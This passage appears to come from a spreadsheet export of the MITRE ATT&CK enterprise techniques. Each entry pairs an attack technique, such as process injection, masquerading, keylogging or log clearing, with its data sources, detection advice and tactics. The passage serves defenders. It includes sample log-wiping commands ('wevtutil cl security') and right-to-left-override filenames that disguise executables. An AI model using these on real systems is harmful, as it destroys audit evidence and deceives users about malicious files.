Specific to Mac, the &lt;code&gt;bonjour&lt;/code&gt; protocol to discover additional Mac-based systems within the same broadcast domain. Utilities such as "ping" and others can be used to gather information about remote systems. The contents of the &lt;code&gt;/etc/hosts&lt;/code&gt; file can be viewed to gain insight into existing hostname to IP mappings on the system.
### Linux
Utilities such as "ping" and others can be used to gather information about remote systems. The contents of the &lt;code&gt;/etc/hosts&lt;/code&gt; file can be viewed to gain insight into existing hostname to IP mappings on the system.</t>
  </si>
  <si>
    <t>System Firmware</t>
  </si>
  <si>
    <t>API monitoring,BIOS,EFI</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</si>
  <si>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</si>
  <si>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</si>
  <si>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Automated Exfiltration</t>
  </si>
  <si>
    <t>File monitoring,Process monitoring,Process use of network</t>
  </si>
  <si>
    <t>Monitor process file access patterns and network behavior. Unrecognized processes or scripts that appear to be traversing file systems and sending network traffic may be suspicious.</t>
  </si>
  <si>
    <t>Data, such as sensitive documents, may be exfiltrated through the use of automated processing or [Scripting](https://attack.mitre.org/techniques/T1064) after being gathered during Collection. 
When automated exfiltration is used, other exfiltration techniques likely apply as well to transfer the information out of the network, such as [Exfiltration Over Command and Control Channel](https://attack.mitre.org/techniques/T1041) and [Exfiltration Over Alternative Protocol](https://attack.mitre.org/techniques/T1048).</t>
  </si>
  <si>
    <t>Remote Services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</si>
  <si>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</si>
  <si>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An adversary may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to log into a service specifically designed to accept remote connections, such as telnet, SSH, and VNC. The adversary may then perform actions as the logged-on user.</t>
  </si>
  <si>
    <t>Data Encrypted</t>
  </si>
  <si>
    <t>File monitoring,Process monitoring,Process command-line parameters,Binary file metadata</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</si>
  <si>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(Citation: Zhang 2013) If the communications channel is unencrypted, encrypted files of known file types can be detected in transit during exfiltration with a network intrusion detection or data loss prevention system analyzing file headers. (Citation: Wikipedia File Header Signatures)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</si>
  <si>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Channel](https://attack.mitre.org/techniques/T1041) and [Exfiltration Over Alternative Protocol](https://attack.mitre.org/techniques/T1048)</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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Custom Cryptographic Protocol</t>
  </si>
  <si>
    <t>Packet capture,Netflow/Enclave netflow,Process use of network,Malware reverse engineering,Process monitoring</t>
  </si>
  <si>
    <t>If malware uses custom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 (Citation: University of Birmingham C2)</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</si>
  <si>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 (Citation: F-Secure Cosmicduke)</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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[Command-Line Interface](https://attack.mitre.org/techniques/T1059). Environment variables, aliases, characters, and other platform/language specific semantics can be used to evade signature based detections and whitelisting mechanisms. (Citation: FireEye Obfuscation June 2017) (Citation: FireEye Revoke-Obfuscation July 2017) (Citation: PaloAlto EncodedCommand March 2017)
Another example of obfuscation is through the use of steganography, a technique of hiding messages or code in images, audio tracks, video clips, or text files. One of the first known and reported adversaries that used steganography activity surrounding [Invoke-PSImage](https://attack.mitre.org/software/S0231). The Duqu malware encrypted the gathered information from a victim's system and hid it into an image followed by exfiltrating the image to a C2 server. (Citation: Wikipedia Duqu) By the end of 2017, an adversary group used [Invoke-PSImage](https://attack.mitre.org/software/S0231) to hide PowerShell commands in an image file (png) and execute the code on a victim's system. In this particular case the PowerShell code downloaded another obfuscated script to gather intelligence from the victim's machine and communicate it back to the adversary. (Citation: McAfee Malicious Doc Targets Pyeongchang Olympics)</t>
  </si>
  <si>
    <t>Windows Remote Management</t>
  </si>
  <si>
    <t>File monitoring,Authentication logs,Netflow/Enclave netflow,Process monitoring,Process command-line parameters</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</si>
  <si>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</si>
  <si>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Windows Remote Management (WinRM) is the name of both a Windows service and a protocol that allows a user to interact with a remote system (e.g., run an executable, modify the Registry, modify services). (Citation: Microsoft WinRM) It may be called with the &lt;code&gt;winrm&lt;/code&gt; command or by any number of programs such as PowerShell. (Citation: Jacobsen 2014)</t>
  </si>
  <si>
    <t>execution,lateral-movement</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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Modify Existing Service</t>
  </si>
  <si>
    <t>Windows Registry,File monitoring,Process monitoring,Process command-line parameters</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</si>
  <si>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 (Citation: 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[cmd](https://attack.mitre.org/software/S0106) commands or scripts.
Look for abnormal process call trees from known services and for execution of other commands that could relate to Discovery or other adversary techniques. Services may also be modified through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1086), so additional logging may need to be configured to gather the appropriate data.</t>
  </si>
  <si>
    <t>Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Registry. Service configurations can be modified using utilities such as sc.exe and [Reg](https://attack.mitre.org/software/S0075).
Adversaries can modify an existing service to persist malware on a system by using system utilities or by using custom tools to interact with the Windows API. Use of existing services is a type of [Masquerading](https://attack.mitre.org/techniques/T1036) that may make detection analysis more challenging. Modifying existing services may interrupt their functionality or may enable services that are disabled or otherwise not commonly used.
Adversaries may also intentionally corrupt or kill services to execute malicious recovery programs/commands. (Citation: Twitter Service Recovery Nov 2017) (Citation: Microsoft Service Recovery Feb 2013)</t>
  </si>
  <si>
    <t>Standard Cryptographic Protocol</t>
  </si>
  <si>
    <t>Packet capture,Netflow/Enclave netflow,Malware reverse engineering,Process use of network,Process monitoring,SSL/TLS inspection</t>
  </si>
  <si>
    <t>SSL/TLS inspection is one way of detecting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</si>
  <si>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</si>
  <si>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System Owner/User Discovery</t>
  </si>
  <si>
    <t>### Windows
Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using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 Mac
On Mac, the currently logged in user can be identified with &lt;code&gt;users&lt;/code&gt;,&lt;code&gt;w&lt;/code&gt;, and &lt;code&gt;who&lt;/code&gt;.
### Linux
On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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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Service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</si>
  <si>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</si>
  <si>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Service](https://attack.mitre.org/techniques/T1050) and [Modify Existing Service](https://attack.mitre.org/techniques/T1031) during service persistence or privilege escalation.</t>
  </si>
  <si>
    <t>execution</t>
  </si>
  <si>
    <t>Masquerading</t>
  </si>
  <si>
    <t>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</si>
  <si>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
For RTLO, detection methods should include looking for common formats of RTLO characters within filenames such as "\u202E", "[U+202E]", and "%E2%80%AE". Defenders should also check their analysis tools to ensure they do not interpret the RTLO character and instead print the true name of the a file containing it.</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</si>
  <si>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or something innocuous. An example of this is when a common system utility or program is moved and renamed to avoid detection based on its usage.(Citation: FireEye APT10 Sept 2018) This is done to bypass tools that trust executables by relying on file name or path, as well as to deceive defenders and system administrators into thinking a file is benign by associating the name with something that is thought to be legitimate.
A third variant uses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file named &lt;code&gt;March 25 \u202Excod.scr&lt;/code&gt; will display as &lt;code&gt;March 25 rcs.docx&lt;/code&gt;. A JavaScript file named &lt;code&gt;photo_high_re\u202Egnp.js&lt;/code&gt; will be displayed as &lt;code&gt;photo_high_resj.png&lt;/code&gt;. A common use of this technique is with spearphishing attachments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 Windows
In another variation of this technique, an adversary may use a renamed copy of a legitimate utility, such as rundll32.exe. (Citation: Endgame Masquerade Ball) An alternative case occurs when a legitimate utility is moved to a different directory and also renamed to avoid detections based on system utilities executing from non-standard paths. (Citation: F-Secure CozyDuke)
An example of abuse of trusted locations in Windows would be the &lt;code&gt;C:\Windows\System32&lt;/code&gt; directory. Examples of trusted binary names that can be given to malicious binares include "explorer.exe" and "svchost.exe".
### Linux
Another variation of this technique includes malicious binaries changing the name of their running process to that of a trusted or benign process, after they have been launched as opposed to before. (Citation: Remaiten)
An example of abuse of trusted locations in Linux  would be the &lt;code&gt;/bin&lt;/code&gt; directory. Examples of trusted binary names that can be given to malicious binares include "rsyncd" and "dbus-inotifier". (Citation: Fysbis Palo Alto Analysis)  (Citation: Fysbis Dr Web Analysis)</t>
  </si>
  <si>
    <t>Logon Scripts</t>
  </si>
  <si>
    <t>Monitor logon scripts for unusual access by abnormal users or at abnormal times. Look for files added or modified by unusual accounts outside of normal administration duties.</t>
  </si>
  <si>
    <t>### Windows
Windows allows logon scripts to be run whenever a specific user or group of users log into a system. (Citation: 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 Mac
Mac allows login and logoff hooks to be run as root whenever a specific user logs into or out of a system. A login hook tells Mac OS X to execute a certain script when a user logs in, but unlike startup items, a login hook executes as root (Citation: creating login hook). There can only be one login hook at a time though. If adversaries can access these scripts, they can insert additional code to the script to execute their tools when a user logs in.</t>
  </si>
  <si>
    <t>lateral-movement,persistence</t>
  </si>
  <si>
    <t>DLL Search Order Hijacking</t>
  </si>
  <si>
    <t>File monitoring,DLL monitoring,Process monitoring,Process command-line parameters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</si>
  <si>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</si>
  <si>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Windows systems use a common method to look for required DLLs to load into a program. (Citation: Microsoft DLL Search) Adversaries may take advantage of the Windows DLL search order and programs that ambiguously specify DLLs to gain privilege escalation and persistence. 
Adversaries may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 (Citation: Microsoft DLL Redirection) (Citation: Microsoft Manifests) (Citation: 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</si>
  <si>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persistence,privilege-escalation,defense-evasion</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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Relay](https://attack.mitre.org/techniques/T1171),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</si>
  <si>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credential-access,discovery</t>
  </si>
  <si>
    <t>Exfiltration Over Command and Control Channel</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</si>
  <si>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</si>
  <si>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Data exfiltration is performed over the Command and Control channel. Data is encoded into the normal communications channel using the same protocol as command and control communications.</t>
  </si>
  <si>
    <t>Change Default File Association</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</si>
  <si>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</si>
  <si>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</si>
  <si>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Commonly Used Port</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</si>
  <si>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</si>
  <si>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File System Permissions Weakness</t>
  </si>
  <si>
    <t>File monitoring,Services,Process command-line parameters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</si>
  <si>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</si>
  <si>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Hijacking](https://attack.mitre.org/techniques/T1038). Some installers may also require elevated privileges that will result in privilege escalation when executing adversary controlled code. This behavior is related to [Bypass User Account Control](https://attack.mitre.org/techniques/T1088). Several examples of this weakness in existing common installers have been reported to software vendors. (Citation: Mozilla Firefox Installer DLL Hijack) (Citation: Seclists Kanthak 7zip Installer)</t>
  </si>
  <si>
    <t>Software Packing</t>
  </si>
  <si>
    <t>Use file scanning to look for known software packers or artifacts of packing techniques. Packing is not a definitive indicator of malicious activity, because legitimate software may use packing techniques to reduce binary size or to protect proprietary code.</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</si>
  <si>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t>
  </si>
  <si>
    <t>Network Service Scanning</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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Windows Management Instrumentation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2015)</t>
  </si>
  <si>
    <t>Exfiltration Over Alternative Protocol</t>
  </si>
  <si>
    <t>User interface,Process monitoring,Process use of network,Packet capture,Netflow/Enclave netflow,Network protocol analysis</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</si>
  <si>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</si>
  <si>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System Network Connections Discovery</t>
  </si>
  <si>
    <t>Adversaries may attempt to get a listing of network connections to or from the compromised system they are currently accessing or from remote systems by querying for information over the network. 
### Windows
Utilities and commands that acquire this information include [netstat](https://attack.mitre.org/software/S0104), "net use," and "net session" with [Net](https://attack.mitre.org/software/S0039).
### Mac and Linux 
In Mac and Linux, &lt;code&gt;netstat&lt;/code&gt; and &lt;code&gt;lsof&lt;/code&gt; can be used to list current connections. &lt;code&gt;who -a&lt;/code&gt; and &lt;code&gt;w&lt;/code&gt; can be used to show which users are currently logged in, similar to "net session".</t>
  </si>
  <si>
    <t>New Service</t>
  </si>
  <si>
    <t>Windows Registry,Process monitoring,Process command-line parameters,Windows event logs</t>
  </si>
  <si>
    <t>Monitor service creation through changes in the Registry and common utilities using command-line invocation. Creation of new services may generate an alterable event (ex: Event ID 4697 and/or 7045 (Citation: Microsoft 4697 APR 2017) (Citation: Microsoft Windows Event Forwarding FEB 2018)).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[Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1086), so additional logging may need to be configured to gather the appropriate data.</t>
  </si>
  <si>
    <t>When operating systems boot up, they can start programs or applications called services that perform background system functions. (Citation: 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[Masquerading](https://attack.mitre.org/techniques/T1036).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Execution](https://attack.mitre.org/techniques/T1035).</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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Data loss prevention,File monitoring</t>
  </si>
  <si>
    <t>Monitor file access on removable media. Detect processes that execute when removable media are mounted.</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</si>
  <si>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</si>
  <si>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Scheduled Task</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</si>
  <si>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</si>
  <si>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
* Event ID 106 - Scheduled task registered
* Event ID 140 - Scheduled task updated
* Event ID 141 - Scheduled task removed
Tools such as Sysinternals Autoruns may also be used to detect system changes that could be attempts at persistence, including listing current scheduled tasks. (Citation: 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[PowerShell](https://attack.mitre.org/techniques/T1086), so additional logging may need to be configured to gather the appropriate data.</t>
  </si>
  <si>
    <t>Utilities such as [at](https://attack.mitre.org/software/S0110) and [schtasks](https://attack.mitre.org/software/S0111),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 (Citation: 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</si>
  <si>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execution,persistence,privilege-escalation</t>
  </si>
  <si>
    <t>Indicator Blocking</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</si>
  <si>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</si>
  <si>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t>
  </si>
  <si>
    <t>An adversary may attempt to block indicators or events typically captured by sensors from being gathered and analyzed. This could include modifying sensor settings stored in configuration files and/or Registry keys to disable or maliciously redirect event telemetry. (Citation: Microsoft Lamin Sept 2017)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t>
  </si>
  <si>
    <t>Process Injection</t>
  </si>
  <si>
    <t>API monitoring,Windows Registry,File monitoring,DLL monitoring,Process monitoring,Named Pipes</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</si>
  <si>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QueueUserAPC/NtQueueApcThread, and those that can be used to modify memory within another process, such as WriteProcessMemory, may be used for this technique. (Citation: Endgame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(Citation: ArtOfMemoryForensics)  (Citation: GNU Acct)  (Citation: RHEL auditd)  (Citation: Chokepoint preload rootkits)
Monitor for named pipe creation and connection events (Event IDs 17 and 18) for possible indicators of infected processes with external modules. (Citation: Microsoft Sysmon v6 May 2017)
Monitor processes and command-line arguments for actions that could be done before or after code injection has occurred and correlate the information with related event information. Code injection may also be performed using [PowerShell](https://attack.mitre.org/techniques/T1086) with tools such as PowerSploit, (Citation: Powersploit) so additional PowerShell monitoring may be required to cover known implementations of this behavior.</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</si>
  <si>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 Windows
There are multiple approaches to injecting code into a live process. Windows implementations include: (Citation: Endgame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 (Citation: Endgame HuntingNMemory June 2017)
* **Thread execution hijacking** involves injecting malicious code or the path to a DLL into a thread of a process. Similar to [Process Hollowing](https://attack.mitre.org/techniques/T1093), the thread must first be suspended.
* **Asynchronous Procedure Call** (APC) injection involves attaching malicious code to the APC Queue (Citation: Microsoft APC) of a process's thread. Queued APC functions are executed when the thread enters an alterable state.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 (Citation: Microsoft Atom Table)
* **Thread Local Storage** (TLS) callback injection involves manipulating pointers inside a portable executable (PE) to redirect a process to malicious code before reaching the code's legitimate entry point. (Citation: FireEye TLS Nov 2017)
### Mac and Linux
Implementations for Linux and OS X/macOS systems include: (Citation: Datawire Code Injection) (Citation: Uninformed Needle)
* **LD_PRELOAD, LD_LIBRARY_PATH** (Linux), **DYLD_INSERT_LIBRARIES** (Mac OS X) environment variables, or the dlfcn application programming interface (API) can be used to dynamically load a library (shared object) in a process which can be used to intercept API calls from the running process. (Citation: Phrack halfdead 1997)
* **Ptrace system calls** can be used to attach to a running process and modify it in runtime. (Citation: Uninformed Needle)
* **/proc/[pid]/mem** provides access to the memory of the process and can be used to read/write arbitrary data to it. This technique is very rare due to its complexity. (Citation: Uninformed Needle)
* **VDSO hijacking** performs runtime injection on ELF binaries by manipulating code stubs mapped in from the linux-vdso.so shared object. (Citation: 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</si>
  <si>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defense-evasion,privilege-escalation</t>
  </si>
  <si>
    <t>Input Capture</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</si>
  <si>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</si>
  <si>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GetAsyncKeyState. (Citation: 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(Citation: Wrightson 2012) Detection of compromised [Valid Accounts](https://attack.mitre.org/techniques/T1078) in use by adversaries may help to catch the result of user input interception if new techniques are used.</t>
  </si>
  <si>
    <t>Adversaries can use methods of capturing user input for obtaining credentials for [Valid Accounts](https://attack.mitre.org/techniques/T1078) and information Collection that include keylogging and user input field interception.
Keylogging is the most prevalent type of input capture, with many different ways of intercepting keystrokes, (Citation: Adventures of a Keystroke) but other methods exist to target information for specific purposes, such as performing a UAC prompt or wrapping the Windows default credential provider. (Citation: Wrightson 2012)
Keylogging is likely to be used to acquire credentials for new access opportunities when [Credential Dumping](https://attack.mitre.org/techniques/T1003)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 (Citation: Volexity Virtual Private Keylogging)</t>
  </si>
  <si>
    <t>collection,credential-access</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</si>
  <si>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</si>
  <si>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</si>
  <si>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information about running processes on a system. Information obtained could be used to gain an understanding of common software running on systems within the network.
### Windows
An example command that would obtain details on processes is "tasklist" using the [Tasklist](https://attack.mitre.org/software/S0057) utility.
### Mac and Linux
In Mac and Linux, this is accomplished with the &lt;code&gt;ps&lt;/code&gt; command.</t>
  </si>
  <si>
    <t>Service Registry Permissions Weakness</t>
  </si>
  <si>
    <t>Process command-line parameters,Services,Windows Registry</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</si>
  <si>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[PowerShell](https://attack.mitre.org/techniques/T1086), so additional logging may need to be configured to gather the appropriate data.</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</si>
  <si>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[Reg](https://attack.mitre.org/software/S0075). Access to Registry keys is controlled through Access Control Lists and permissions. (Citation: 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 (Citation: Twitter Service Recovery Nov 2017)</t>
  </si>
  <si>
    <t>Command-Line Interface</t>
  </si>
  <si>
    <t>Command-line interface activities can be captured through proper logging of process execution with command-line arguments. This information can be useful in gaining additional insight to adversaries' actions through how they use native processes or custom tools.</t>
  </si>
  <si>
    <t>Command-line interfaces provide a way of interacting with computer systems and is a common feature across many types of operating system platforms. (Citation: Wikipedia Command-Line Interface) One example command-line interface on Windows systems is [cmd](https://attack.mitre.org/software/S0106),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Task](https://attack.mitre.org/techniques/T1053)).
Adversaries may use command-line interfaces to interact with systems and execute other software during the course of an operation.</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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[Command-Line Interface](https://attack.mitre.org/techniques/T1059), to search for information and execute files via mouse double-click events, the Windows Run command (Citation: Wikipedia Run Command), or other potentially difficult to monitor interactions.</t>
  </si>
  <si>
    <t>Hypervisor</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</si>
  <si>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</si>
  <si>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</si>
  <si>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Security Software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</si>
  <si>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</si>
  <si>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attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on the system. This may include things such as local firewall rules and anti-virus. These checks may be built into early-stage remote access tools.
### Windows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 Mac
It's becoming more common to see macOS malware perform checks for LittleSnitch and KnockKnock software.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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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(Citation: Metasploit) (Citation: Metasploit),  (Citation: Veil) (Citation: Veil),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</si>
  <si>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</si>
  <si>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Uncommonly Used Port</t>
  </si>
  <si>
    <t>Adversaries may conduct C2 communications over a non-standard port to bypass proxies and firewalls that have been improperly configured.</t>
  </si>
  <si>
    <t>Indicator Removal from Tools</t>
  </si>
  <si>
    <t>Process use of network,Process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</si>
  <si>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</si>
  <si>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Packing](https://attack.mitre.org/techniques/T1045) or otherwise modify the file so it has a different signature, and then re-use the malware.</t>
  </si>
  <si>
    <t>Bootkit</t>
  </si>
  <si>
    <t>API monitoring,MBR,VBR</t>
  </si>
  <si>
    <t>Linux,Windows</t>
  </si>
  <si>
    <t>Perform integrity checking on MBR and VBR. Take snapshots of MBR and VBR and compare against known good samples. Report changes to MBR and VBR as they occur for indicators of suspicious activity and further analysis.</t>
  </si>
  <si>
    <t>A bootkit is a malware variant that modifies the boot sectors of a hard drive, including the Master Boot Record (MBR) and Volume Boot Record (VBR). (Citation: MTrends 2016)
Adversaries may use bootkits to persist on systems at a layer below the operating system, which may make it difficult to perform full remediation unless an organization suspects one was used and can act accordingly.
###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 Volume Boot Record
The MBR passes control of the boot process to the VBR. Similar to the case of MBR, an adversary who has raw access to the boot drive may overwrite the VBR to divert execution during startup to adversary code.</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</si>
  <si>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</si>
  <si>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</si>
  <si>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[Credential Dumping](https://attack.mitre.org/techniques/T1003). Look for additional activity that may indicate an adversary has gained higher privileges.</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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Adversaries may attempt to find local system or domain-level groups and permissions settings. 
### Windows
Examples of commands that can list groups are &lt;code&gt;net group /domain&lt;/code&gt; and &lt;code&gt;net localgroup&lt;/code&gt; using the [Net](https://attack.mitre.org/software/S0039) utility.
### Mac
On Mac, this same thing can be accomplished with the &lt;code&gt;dscacheutil -q group&lt;/code&gt; for the domain, or &lt;code&gt;dscl . -list /Groups&lt;/code&gt; for local groups.
### Linux
On Linux, local groups can be enumerated with the &lt;code&gt;groups&lt;/code&gt; command and domain groups via the &lt;code&gt;ldapsearch&lt;/code&gt; command.</t>
  </si>
  <si>
    <t>Indicator Removal on Host</t>
  </si>
  <si>
    <t>File monitoring,Process monitoring,Process command-line parameters,API monitoring,Windows event logs</t>
  </si>
  <si>
    <t>File system monitoring may be used to detect improper deletion or modification of indicator files. For example, deleting Windows event logs (via native binaries (Citation: Microsoft wevtutil Oct 2017), API functions (Citation: Microsoft EventLog.Clear), or [PowerShell](https://attack.mitre.org/techniques/T1086) (Citation: Microsoft Clear-EventLog)) may generate an alterable event (Event ID 1102: "The audit log was cleared"). Events not stored on the file system may require different detection mechanisms.</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</si>
  <si>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History](https://attack.mitre.org/techniques/T1139)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
### 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 &lt;code&gt;wevtutil cl system&lt;/code&gt;
* &lt;code&gt;wevtutil cl application&lt;/code&gt;
* &lt;code&gt;wevtutil cl security&lt;/code&gt;
Logs may also be cleared through other mechanisms, such as [PowerShell](https://attack.mitre.org/techniques/T1086).</t>
  </si>
  <si>
    <t>Standard Application Layer Protocol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</si>
  <si>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(Citation: University of Birmingham C2)</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</si>
  <si>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</si>
  <si>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Third-party Software</t>
  </si>
  <si>
    <t>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</si>
  <si>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</si>
  <si>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</si>
  <si>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DLL Side-Loading</t>
  </si>
  <si>
    <t>Process use of network,Process monitoring,Loaded DLLs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</si>
  <si>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</si>
  <si>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Programs may specify DLLs that are loaded at runtime. Programs that improperly or vaguely specify a required DLL may be open to a vulnerability in which an unintended DLL is loaded. Side-loading vulnerabilities specifically occur when Windows Side-by-Side (WinSxS) manifests (Citation: MSDN Manifests) are not explicit enough about characteristics of the DLL to be loaded. Adversaries may take advantage of a legitimate program that is vulnerable to side-loading to load a malicious DLL. (Citation: Stewart 2014)
Adversaries likely use this technique as a means of masking actions they perform under a legitimate, trusted system or software process.</t>
  </si>
  <si>
    <t>Data Staged</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</si>
  <si>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[PowerShell](https://attack.mitre.org/techniques/T1086).</t>
  </si>
  <si>
    <t>Collected data is staged in a central location or directory prior to Exfiltration. Data may be kept in separate files or combined into one file through techniques such as [Data Compressed](https://attack.mitre.org/techniques/T1002) or [Data Encrypted](https://attack.mitre.org/techniques/T1022).
Interactive command shells may be used, and common functionality within [cmd](https://attack.mitre.org/software/S0106) and bash may be used to copy data into a staging location.</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</si>
  <si>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</si>
  <si>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</si>
  <si>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(Citation: NSA Spotting)</t>
  </si>
  <si>
    <t>Remote Desktop Protocol</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</si>
  <si>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</si>
  <si>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</si>
  <si>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(Citation: TechNet Remote Desktop Services) There are other implementations and third-party tools that provide graphical access [Remote Services](https://attack.mitre.org/techniques/T1021)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Features](https://attack.mitre.org/techniques/T1015) technique for Persistence. (Citation: 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 (Citation: RDP Hijacking Korznikov) This can be done remotely or locally and with active or disconnected sessions. (Citation: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RedSnarf. (Citation: Kali Redsnarf)</t>
  </si>
  <si>
    <t>Windows Admin Shares</t>
  </si>
  <si>
    <t>Process use of network,Authentication logs,Process monitoring,Process command-line parameters</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</si>
  <si>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 (Citation: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</si>
  <si>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[Valid Accounts](https://attack.mitre.org/techniques/T1078) to remotely access a networked system over server message block (SMB) (Citation: Wikipedia SMB) to interact with systems using remote procedure calls (RPCs), (Citation: TechNet RPC) transfer files, and run transferred binaries through remote Execution. Example execution techniques that rely on authenticated sessions over SMB/RPC are [Scheduled Task](https://attack.mitre.org/techniques/T1053), [Service Execution](https://attack.mitre.org/techniques/T1035), and [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047). Adversaries can also use NTLM hashes to access administrator shares on systems with [Pass the Hash](https://attack.mitre.org/techniques/T1075) and certain configuration and patch levels. (Citation: Microsoft Admin Shares)
The [Net](https://attack.mitre.org/software/S0039) utility can be used to connect to Windows admin shares on remote systems using &lt;code&gt;net use&lt;/code&gt; commands with valid credentials. (Citation: Technet Net Use)</t>
  </si>
  <si>
    <t>Valid Accounts</t>
  </si>
  <si>
    <t>Authentication logs,Process monitoring</t>
  </si>
  <si>
    <t xml:space="preserve">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 </t>
  </si>
  <si>
    <t>Adversaries may steal the credentials of a specific user or service account using Credential Access techniques or capture credentials earlier in their reconnaissance process through social engineering for means of gaining Initial Access. 
Accounts that an adversary may use can fall into three categories: default, local, and domain accounts. Default accounts are those that are built-into an OS such as Guest or Administrator account on Windows systems or default factory/provider set accounts on other types of systems, software, or devices. Local accounts are those configured by an organization for use by users, remote support, services, or for administration on a single system or service. (Citation: Microsoft Local Accounts Feb 2019) Domain accounts are those managed by Active Directory Domain Services where access and permissions are configured across systems and services that are part of that domain. Domain accounts can cover users, administrators, and services.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Default accounts are also not limited to Guest and Administrator on client machines, they also include accounts that are preset for equipment such as network devices and computer applications whether they are internal, open source, or COTS. Appliances that come preset with a username and password combination pose a serious threat to organizations that do not change it post installation, as they are easy targets for an adversary. Similarly, adversaries may also utilize publicly disclosed private keys, or stolen private keys, to legitimately connect to remote environments via [Remote Services](https://attack.mitre.org/techniques/T1021) (Citation: Metasploit SSH Module)
The overlap of account access, credentials, and permissions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</si>
  <si>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</si>
  <si>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Multilayer Encryption</t>
  </si>
  <si>
    <t>Packet capture,Process use of network,Malware reverse engineering,Process monitoring</t>
  </si>
  <si>
    <t>If malware uses [Standard Cryptographic Protocol](https://attack.mitre.org/techniques/T1032), SSL/TLS inspection can be used to detect command and control traffic within some encrypted communication channels. (Citation: SANS Decrypting SSL) SSL/TLS inspection does come with certain risks that should be considered before implementing to avoid potential security issues such as incomplete certificate validation. (Citation: SEI SSL Inspection Risks) After SSL/TLS inspection, additional cryptographic analysis may be needed to analyze the second layer of encryption.
With [Custom Cryptographic Protocol](https://attack.mitre.org/techniques/T1024), if malware uses encryption with symmetric keys, it may be possible to obtain the algorithm and key from samples and use them to decode network traffic to detect malware communications signatures. (Citation: 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</si>
  <si>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performs C2 communications using multiple layers of encryption, typically (but not exclusively) tunneling a custom encryption scheme within a protocol encryption scheme such as HTTPS or SMTPS.</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</si>
  <si>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</si>
  <si>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</si>
  <si>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Modification](https://attack.mitre.org/techniques/T1023) of directory .LNK files that use [Masquerading](https://attack.mitre.org/techniques/T1036) to look like the real directories, which are hidden through [Hidden Files and Directories](https://attack.mitre.org/techniques/T1158).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t>
  </si>
  <si>
    <t>Credentials in Files</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</si>
  <si>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</si>
  <si>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</si>
  <si>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Dumping](https://attack.mitre.org/techniques/T1003). (Citation: CG 2014) Passwords may also be obtained from Group Policy Preferences stored on the Windows Domain Controller. (Citation: SRD GPP)</t>
  </si>
  <si>
    <t>System Information Discovery</t>
  </si>
  <si>
    <t>An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture.
### Windows
Example commands and utilities that obtain this information include &lt;code&gt;ver&lt;/code&gt;, [Systeminfo](https://attack.mitre.org/software/S0096), and &lt;code&gt;dir&lt;/code&gt; within [cmd](https://attack.mitre.org/software/S0106) for identifying information based on present files and directories.
###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</si>
  <si>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</si>
  <si>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</si>
  <si>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enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. 
### Windows
Example utilities used to obtain this information are &lt;code&gt;dir&lt;/code&gt; and &lt;code&gt;tree&lt;/code&gt;. (Citation: Windows Commands JPCERT) Custom tools may also be used to gather file and directory information and interact with the Windows API.
### Mac and Linux
In Mac and Linux, this kind of discovery is accomplished with the &lt;code&gt;ls&lt;/code&gt;, &lt;code&gt;find&lt;/code&gt;, and &lt;code&gt;locate&lt;/code&gt; commands.</t>
  </si>
  <si>
    <t>Windows Management Instrumentation Event Subscription</t>
  </si>
  <si>
    <t>Monitor WMI event subscription entries, comparing current WMI event subscriptions to known good subscriptions for each host. Tools such as Sysinternals Autoruns may also be used to detect WMI changes that could be attempts at persistence. (Citation: TechNet Autoruns)</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</si>
  <si>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(Citation: Dell WMI Persistence) Examples of events that may be subscribed to are the wall clock time or the computer's uptime. (Citation: Kazanciyan 2014) Several threat groups have reportedly used this technique to maintain persistence. (Citation: Mandiant M-Trends 2015)</t>
  </si>
  <si>
    <t>Rundll32</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</si>
  <si>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</si>
  <si>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be used to execute Control Panel Item files (.cpl) through the undocumented shell32.dll functions &lt;code&gt;Control_RunDLL&lt;/code&gt; and &lt;code&gt;Control_RunDLLAsUser&lt;/code&gt;. Double-clicking a .cpl file also causes rundll32.exe to execute. (Citation: Trend Micro CPL)
Rundll32 can also been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</si>
  <si>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PowerShell</t>
  </si>
  <si>
    <t>PowerShell logs,Loaded DLLs,DLL monitoring,Windows Registry,File monitoring,Process monitoring,Process command-line parameters</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</si>
  <si>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 (Citation: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 (Citation: FireEye PowerShell Logging 2016) An organization can gather PowerShell execution details in a data analytic platform to supplement it with other data.</t>
  </si>
  <si>
    <t>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[Empire](https://attack.mitre.org/software/S0363),  PowerSploit, (Citation: Powersploit) and PSAttack. (Citation: Github PSAttack)
PowerShell commands/scripts can also be executed without directly invoking the powershell.exe binary through interfaces to PowerShell's underlying System.Management.Automation assembly exposed through the .NET framework and Windows Common Language Interface (CLI). (Citation: Sixdub PowerPick Jan 2016)(Citation: SilentBreak Offensive PS Dec 2015) (Citation: Microsoft PSfromCsharp APR 2014)</t>
  </si>
  <si>
    <t>Account Discovery</t>
  </si>
  <si>
    <t>Adversaries may attempt to get a listing of local system or domain accounts. 
### Windows
